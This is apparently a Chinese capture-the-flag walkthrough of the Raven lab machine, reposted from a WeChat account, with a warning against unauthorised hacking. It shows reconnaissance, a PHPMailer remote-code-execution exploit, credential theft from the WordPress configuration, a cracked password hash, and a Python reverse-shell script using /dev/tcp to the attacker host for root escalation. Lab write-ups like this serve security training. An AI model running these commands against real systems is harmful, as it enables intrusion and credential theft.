前言
首先大家一定要记住,所有未经授权的渗透都是违法的,所以大家切勿一通乱黑,被关进橘子有的哭了。我们可以在本地搭建一些本地靶场,比如Dvwa
项目介绍
靶机:172.16.10.41
攻击机:172.16.10.10;172.16.10.26
一、信息收集
1.主机信息
2.端口信息
3.服务信息
nmap -p22,80,111,52162 -sS -sV -sC -A -T4 172.16.10.41Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 21:30 ESTNmap scan report for 172.16.10.41Host is up (0.00050s latency).PORT STATE SERVICE VERSIONopen ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)ssh-hostkey:1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)open http Apache httpd 2.4.10 ((Debian)): Raven Security: Apache/2.4.10 (Debian)open rpcbind 2-4 (RPC #100000)rpcinfo:program version port/proto service100000 2,3,4 111/tcp rpcbind100000 2,3,4 111/udp rpcbind100000 3,4 111/tcp6 rpcbind100000 3,4 111/udp6 rpcbind100024 1 38998/tcp6 status100024 1 52162/tcp status100024 1 53502/udp status100024 1 57762/udp6 statusopen status 1 (RPC #100024)MAC Address: 00:0C:29:68:95:A8 (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.50 ms 172.16.10.41OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
二、漏洞分析
1.Web信息
有80端口,我们访问一下,主页如下所示:
查看网页源代码找的一个flag
2.Wordpress用户
wpscan --url http://172.16.10.41/wordpress --wp-content-dir -ep -et -eu[i] User(s) Identified:[+] steven| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] michael| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)
3.目录爆破
开飞机也没能跳转到登入页和注册页,扫描一下网站目录看看有哪些信息
访问/vendor看看
访问/vendor/PATH获得服务器网站路径
访问/vendor/SECURITY.md获得PHPMailer安全信息
版本信息
该靶机有phpMailer邮件服务,且该版本为5.2.16,找一下关于5.2.16版本的漏洞信息
![Raven(十)]( "Raven(十)")
这里选择第三个远程代码执行漏洞——40974.py
在其头文件加上
#!/usr/bin/python# -*- coding: utf-8 -*-
![Raven(十)]( "Raven(十)")
设置目标地址,监听IP和端口
![Raven(十)]( "Raven(十)")
设置完成后,进行一下操作
![Raven(十)]( "Raven(十)")
![Raven(十)]( "Raven(十)")
查看whoami和id
![Raven(十)]( "Raven(十)")
权限很低,先看看目录结构
![Raven(十)]( "Raven(十)")
在www目录下找到flag2
![Raven(十)]( "Raven(十)")
![Raven(十)]( "Raven(十)")
进入wordpress目录看到php连接数据库的配置文件
![Raven(十)]( "Raven(十)")
查看配置文件信息,找连接数据的用户和密码
![Raven(十)]( "Raven(十)")
找到用户和密码后,进入数据库
![Raven(十)]( "Raven(十)")
查看数据库
![Raven(十)]( "Raven(十)")
查看库表
![Raven(十)]( "Raven(十)")
查看wp_users中的字段内容
![Raven(十)]( "Raven(十)")
两用户密码都是加密的,其中steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/被轻松解密
steven:pink84
![Raven(十)]( "Raven(十)")
三、权限提升
将上面拿到的用户密码,ssh一下,发现成功进入目标系统
查找提权点
发现该用户运行python可以以root身份执行并不需要密码,那我们就构造一个反弹shell
编写一个dajun.py文件内容如下所示
import subprocesscommand = "bash -c 'exec bash -i >& /dev/tcp/172.16.10.10/9090 0>&1'"try:output = subprocess.check_output(command, shell=True)print("成功反弹了Shell!")except Exception as e:print("无法反弹Shell:", str(e))
在攻击机监听9090端口
接着执行该payload
回到攻击机上查看
已经成功上线并拿到root的shell
在root用户下看到flag4
发现还少了一个flag3,已经拿到了root用户权限,使用find查找一下
发现也就只看到flag4,回到前面数据库解码出来的steven:pink84登入后台看看
wordpress/wp-login.php?loggedout=true
在邮件中找到flag3
到这里就完成任务了。
原文始发于微信公众号(Red Teams):Raven(十)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论